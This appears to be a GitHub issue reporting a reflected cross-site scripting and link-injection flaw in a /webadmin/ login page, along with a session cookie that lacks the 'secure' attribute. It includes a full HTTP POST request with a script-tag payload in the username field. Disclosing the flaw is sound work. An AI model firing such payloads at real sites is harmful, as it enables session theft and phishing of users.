This repository was archived by the owner on Mar 23, 2021. It is now read-only.
This repository was archived by the owner on Mar 23, 2021. It is now read-only.
XSS/Link Injection vulnerability on /webadmin/ login page #147
Description
The username parameter is insecure, allowing for cross-site script injection, link injection, and phishing through frames from the login page:
POST /webadmin/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: https://ourserver.com/webadmin/
Cookie: PHPSESSID=ra4sfb0vjui2ck2m95se7f06v0
Connection: keep-alive
Host: ourserver.com
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: https://ourserver.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
loginwith=adlogin&username=<script>alert(1234)</script>&password=&submit=
Additionally, the PHPSESSID cookie missing the 'secure' attribute:
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Length: 2083
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
**Set-Cookie: PHPSESSID=fhbh9ljrnsddl2cu3jt1752942; path=/**
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.4.16
Connection: Keep-Alive
Date: Mon, 09 Dec 2019 22:33:27 GMT
Keep-Alive: timeout=5, max=68
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0